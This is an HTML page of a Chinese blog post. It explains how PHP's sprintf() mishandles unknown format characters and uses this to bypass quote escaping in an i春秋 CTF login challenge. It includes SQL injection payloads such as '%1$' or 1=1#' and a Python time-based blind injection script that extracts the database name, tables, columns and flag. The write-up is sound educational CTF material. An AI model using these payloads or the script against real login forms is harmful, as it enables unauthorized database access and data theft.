<!DOCTYPE html>
<html>
  <!-- Html Head Tag-->
  <head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="description" content>
  <meta name="author" content="gelinlang">
  <!-- Open Graph Data -->
  <meta property="og:title" content="SQLi之sprintf-格式漏洞">
  <meta property="og:description" content="路漫漫求修远兮，我将上下而求索">
  <meta property="og:site_name" content="gelinlang&#39;s Blog">
  <meta property="og:type" content="article">
  <meta property="og:image" content="http://gelinlang.cn">
  
    <link rel="alternate" href="/atom.xml" title="gelinlang&#39;s Blog" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  

  <!-- Site Title -->
  <title>gelinlang's Blog</title>

  <!-- Bootstrap CSS -->
  <link rel="stylesheet" href="/css/bootstrap.min.css">
  <!-- Custom CSS -->
  
  <link rel="stylesheet" href="/css/style.light.css">

  <!-- Google Analytics -->
  

</head>

  <body>
    <!-- Page Header -->


<header class="site-header header-background" style="background-image: url(/img/default-banner-dark.jpg)">
  <div class="container">
    <div class="row">
      <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
        <div class="page-title with-background-image">
          <p class="title">SQLi之sprintf-格式漏洞</p>
          <p class="subtitle"></p>
        </div>
        <div class="site-menu with-background-image">
          <ul>
            
              <li>
                <a href="/">
                  
                  Home
                  
                </a>
              </li>
            
              <li>
                <a href="/archives">
                  
                  Archives
                  
                </a>
              </li>
            
              <li>
                <a href="/tags/ || tages">
                  
                  tags
                  
                </a>
              </li>
            
              <li>
                <a href="/categories/ || th">
                  
                  categories
                  
                </a>
              </li>
            
              <li>
                <a href="/gelinlang@163.com">
                  
                  Email
                  
                </a>
              </li>
            
          </ul>
        </div>
      </div>
    </div>
  </div>
</header>

<article>
  <div class="container typo">
    <div class="row">
      <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
        <div class="post-info text-muted">
          
            <!-- Author -->
            <span class="author info">By gelinlang</span>
          
          <!-- Date -->
          <span class="date-time info">On
            <span class="date">2019-04-23</span>
            <span class="time">22:12:25</span>
          </span>
          
          <!--  Categories  -->
            <span class="categories info">Under 

<a href="/categories/随笔/">随笔</a>
</span>
          
        </div>
        <!-- Tags -->
        
          <div class="post-tags text-muted">
            Tags: 

<a class="tag" href="/tags/sprintf/">#sprintf()</a>


          </div>
        
        <!-- Post Main Content -->
        <div class="post-content">
          <p>sprintf() 函数把格式化的字符串写入变量中。<br>arg1、arg2、++ 参数将被插入到主字符串中的百分号（%）符号处。该函数是逐步执行的。在第一个 % 符号处，插入 arg1，在第二个 % 符号处，插入 arg2，依此类推。<br><a id="more"></a><br>注释：如果 % 符号多于 arg 参数，则您必须使用占位符。占位符位于 % 符号之后，由数字和 “\$” 组成。<br>语法：sprintf(format,arg1,arg2,arg++)，format和arg1是必需的。<br>例：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$number = 123;</span><br><span class="line">$txt = sprintf(&quot;带两位小数：%1\$.2f</span><br><span class="line">&lt;br&gt;不带小数：%1\$u&quot;,$number);</span><br><span class="line">echo $txt;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<p>输出带有两位小数：123.00 不带小数：123<br>但是在php源码中只对15种类型做了匹配。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">%% - 返回一个百分号 %</span><br><span class="line">%b - 二进制数</span><br><span class="line">%c - ASCII 值对应的字符</span><br><span class="line">%d - 包含正负号的十进制数（负数、0、正数）</span><br><span class="line">%e - 使用小写的科学计数法（例如 1.2e+2）</span><br><span class="line">%E - 使用大写的科学计数法（例如 1.2E+2）</span><br><span class="line">%u - 不包含正负号的十进制数（大于等于 0）</span><br><span class="line">%f - 浮点数（本地设置）</span><br><span class="line">%F - 浮点数（非本地设置）</span><br><span class="line">%g - 较短的 %e 和 %f</span><br><span class="line">%G - 较短的 %E 和 %f</span><br><span class="line">%o - 八进制数</span><br><span class="line">%s - 字符串</span><br><span class="line">%x - 十六进制数（小写字母）</span><br><span class="line">%X - 十六进制数（大写字母）</span><br></pre></td></tr></table></figure></p>
<p>而其他字符类型都直接break了，php未做任何处理，直接跳过，所以导致了，如果%后面出现一个\,那么php会把\当作一个格式化字符的类型, 也就是%\或者%1$\这样，因为没有此类型的匹配导致被替换为空。</p>
<p>实例：<br>i春秋上的一道CTF:SQLi，页面显示登陆框，查看源码和扫描目录，没发现。测试admin/admin，显示密码错误，说明用户admin存在。然后用burpsuite的intruder模块测试下哪些字符不能用。<br>发现都返回username error，但是%返回不一样，有一个sprintf()错误。可以利用上述的漏洞。<br>构造<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">%1$&apos; or 1=1#</span><br><span class="line">返回password error，</span><br><span class="line">%1$&apos; or 1=2#</span><br><span class="line">返回usernam error。</span><br></pre></td></tr></table></figure></p>
<p>说明%1$起作用了。<br>接下来写脚本，<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/env python</span><br><span class="line"># -*- coding: utf-8 -*-</span><br><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line"></span><br><span class="line">chars = &quot;0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ&#123;&#125;!@#$%^&amp;*()_+-=&quot;</span><br><span class="line">url = &quot;http://48fb53c69976426ea6612bcaa25d53903632d297359a4a1f.changame.ichunqiu.com/&quot;</span><br><span class="line">name = &quot;&quot;</span><br><span class="line"></span><br><span class="line"># 难得的爆长度了，随便选个较大的。</span><br><span class="line">for i in range(1, 50):</span><br><span class="line">    print(i)</span><br><span class="line">    for char in chars:</span><br><span class="line">        #这里用时间盲注，也可以用布尔盲注，判断返回的是username error还是password error就行。</span><br><span class="line">        # 爆数据库名</span><br><span class="line">        # payload = &quot;%1$&apos; or if(ascii(substr(database(),&quot; + str(i) + &quot;,1))=&quot; + str(ord(char)) + &quot;, sleep(5), 1)#&quot;</span><br><span class="line">        # 爆表名</span><br><span class="line">        # payload = &quot;%1$&apos; or if(ascii(substr((select table_name from information_schema.tables &quot; \</span><br><span class="line">        #           &quot;where table_schema=database() limit 0,1),&quot; + str(i) + &quot;,1))=&quot; + str(ord(char)) + &quot;, sleep(5), 1)#&quot;</span><br><span class="line">        # 爆列名</span><br><span class="line">        # payload = &quot;%1$&apos; or if(ascii(substr((select column_name from information_schema.columns &quot; \</span><br><span class="line">        #           &quot;where table_name=0x666c6167 limit 0,1),&quot; + str(i) + &quot;,1))=&quot; + str(ord(char)) + &quot;, sleep(5), 1)#&quot;</span><br><span class="line">        # 爆字段</span><br><span class="line">        payload = &quot;%1$&apos; or if(ascii(substr((select flag from flag),&quot; + str(i) + &quot;,1))=&quot; + str(ord(char)) + &quot;, sleep(5), 1)#&quot;</span><br><span class="line"></span><br><span class="line">        data = &#123;</span><br><span class="line">            &quot;username&quot;: payload,</span><br><span class="line">            &quot;password&quot;: &quot;1&quot;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        start = time.time()</span><br><span class="line">        res = requests.post(url, data=data)</span><br><span class="line">        end = time.time()</span><br><span class="line">        if end - start &gt;= 5:</span><br><span class="line">            name += char</span><br><span class="line">            print(name)</span><br><span class="line">            break</span><br></pre></td></tr></table></figure></p>
<p>flag如下<br><img src="https://upload-images.jianshu.io/upload_images/16514845-b4223033a424e9c1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"></p>

        </div>
      </div>
    </div>
  </div>
</article>



    <!-- Footer -->
<footer>
  <div class="container">
    <div class="row">
      <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
        <p class="copyright text-muted">
          Theme By <a target="_blank" href="https://github.com/levblanc">Levblanc.</a>
          Inspired By <a target="_blank" href="https://github.com/klugjo/hexo-theme-clean-blog">Clean Blog.</a>
        </p><p class="copyright text-muted">
          Powered By <a target="_blank" href="https://hexo.io/">Hexo.</a>
        </p>
      </div>
    </div>
  </div>
</footer>


    <!-- After Footer Scripts -->
<script src="/js/highlight.pack.js"></script>
<script>
  document.addEventListener("DOMContentLoaded", function(event) {
    var codeBlocks = Array.prototype.slice.call(document.getElementsByTagName('pre'))
    codeBlocks.forEach(function(block, index) {
      hljs.highlightBlock(block);
    });
  });
</script>

  </body>
</html>

